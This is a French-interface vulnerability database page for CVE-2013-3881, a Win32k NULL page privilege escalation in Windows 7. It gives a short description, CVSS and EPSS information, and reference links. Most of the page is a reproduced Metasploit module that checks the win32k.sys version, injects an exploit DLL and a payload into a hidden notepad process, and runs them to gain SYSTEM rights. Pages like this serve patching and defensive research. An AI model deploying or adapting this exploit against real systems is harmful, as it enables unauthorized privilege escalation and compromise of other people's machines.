Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Descriptions du CVE
win32k.sys in the kernel-mode drivers in Microsoft Windows 7 SP1 and Windows Server 2008 R2 SP1 allows local users to gain privileges via a crafted application, aka "Win32k NULL Page Vulnerability."
Informations du CVE
Faiblesses connexes
| Nom de la faiblesse | Source | |
|---|---|---|
| Category : Resource Management Errors Weaknesses in this category are related to improper management of system resources. |
Métriques
| Métriques | Score | Gravité | CVSS Vecteur | Source |
|---|---|---|---|---|
| V2 | 7.2 | AV:L/AC:L/Au:N/C:C/I:C/A:C | nvd@nist.gov |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 31576
Date de publication : 2014-02-10 23h00 +00:00
Auteur : Metasploit
EDB Vérifié : Yes
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/post/windows/reflective_dll_injection'
require 'rex'
class Metasploit3 < Msf::Exploit::Local
Rank = AverageRanking
include Msf::Post::File
include Msf::Post::Windows::Priv
include Msf::Post::Windows::Process
include Msf::Post::Windows::FileInfo
include Msf::Post::Windows::ReflectiveDLLInjection
def initialize(info={})
super(update_info(info, {
'Name' => 'Windows TrackPopupMenuEx Win32k NULL Page',
'Description' => %q{
This module exploits a vulnerability in win32k.sys where under
specific conditions TrackPopupMenuEx will pass a NULL pointer to
the MNEndMenuState procedure. This module has been tested
successfully on Windows 7 SP0 and Windows 7 SP1.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Seth Gibson', # vulnerability discovery
'Dan Zentner', # vulnerability discovery
'Matias Soler', # vulnerability analysis
'Spencer McIntyre'
],
'Arch' => ARCH_X86,
'Platform' => 'win',
'SessionTypes' => [ 'meterpreter' ],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Targets' =>
[
[ 'Windows 7 SP0/SP1', { } ]
],
'Payload' =>
{
'Space' => 4096,
'DisableNops' => true
},
'References' =>
[
[ 'CVE', '2013-3881' ],
[ 'OSVDB', '98212' ],
[ 'BID', '62830'],
[ 'MSB', 'MS13-081' ],
[ 'URL', 'http://endgame.com/news/microsoft-win32k-null-page-vulnerability-technical-analysis.html' ],
[ 'URL', 'http://immunityproducts.blogspot.com/2013/11/exploiting-cve-2013-3881-win32k-null.html' ]
],
'DisclosureDate' => 'Oct 08 2013',
'DefaultTarget' => 0
}))
end
def check
os = sysinfo["OS"]
if (os =~ /windows/i) == nil
return Exploit::CheckCode::Unknown
end
file_path = expand_path("%windir%") << "\\system32\\win32k.sys"
major, minor, build, revision, branch = file_version(file_path)
vprint_status("win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}")
case build
when 7600
return Exploit::CheckCode::Vulnerable
when 7601
return Exploit::CheckCode::Vulnerable if revision <= 18126
when 9200
return Exploit::CheckCode::Safe
end
return Exploit::CheckCode::Unknown
end
def exploit
if is_system?
fail_with(Exploit::Failure::None, 'Session is already elevated')
end
if check != Exploit::CheckCode::Vulnerable
fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system.")
end
if sysinfo["Architecture"] =~ /wow64/i
fail_with(Failure::NoTarget, "Running against WOW64 is not supported")
elsif sysinfo["Architecture"] =~ /x64/
fail_with(Failure::NoTarget, "Running against 64-bit systems is not supported")
end
print_status("Launching notepad to host the exploit...")
notepad_process = client.sys.process.execute("notepad.exe", nil, {'Hidden' => true})
begin
process = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS)
print_good("Process #{process.pid} launched.")
rescue Rex::Post::Meterpreter::RequestError
# Reader Sandbox won't allow to create a new process:
# stdapi_sys_process_execute: Operation failed: Access is denied.
print_status("Operation failed. Trying to elevate the current process...")
process = client.sys.process.open
end
print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
library_path = ::File.join(Msf::Config.data_directory, "exploits",
"cve-2013-3881", "cve-2013-3881.x86.dll")
library_path = ::File.expand_path(library_path)
print_status("Injecting exploit into #{process.pid}...")
exploit_mem, offset = inject_dll_into_process(process, library_path)
print_status("Exploit injected. Injecting payload into #{process.pid}...")
payload_mem = inject_into_process(process, payload.encoded)
# invoke the exploit, passing in the address of the payload that
# we want invoked on successful exploitation.
print_status("Payload injected. Executing exploit...")
process.thread.create(exploit_mem + offset, payload_mem)
print_good("Exploit finished, wait for (hopefully privileged) payload execution to complete.")
end
end
Products Mentioned
Configuraton 0
Microsoft>>Windows_7 >> Version *
- Microsoft>>Windows_7 >> Version - (Open CPE detail)
Microsoft>>Windows_7 >> Version *
- Microsoft>>Windows_7 >> Version - (Open CPE detail)
Références
https://docs.microsoft.com/en-us/security-updates/securitybulletins/2013/ms13-081
Tags : vendor-advisory, x_refsource_MS
Tags : vendor-advisory, x_refsource_MS
https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A18614
Tags : vdb-entry, signature, x_refsource_OVAL
Tags : vdb-entry, signature, x_refsource_OVAL
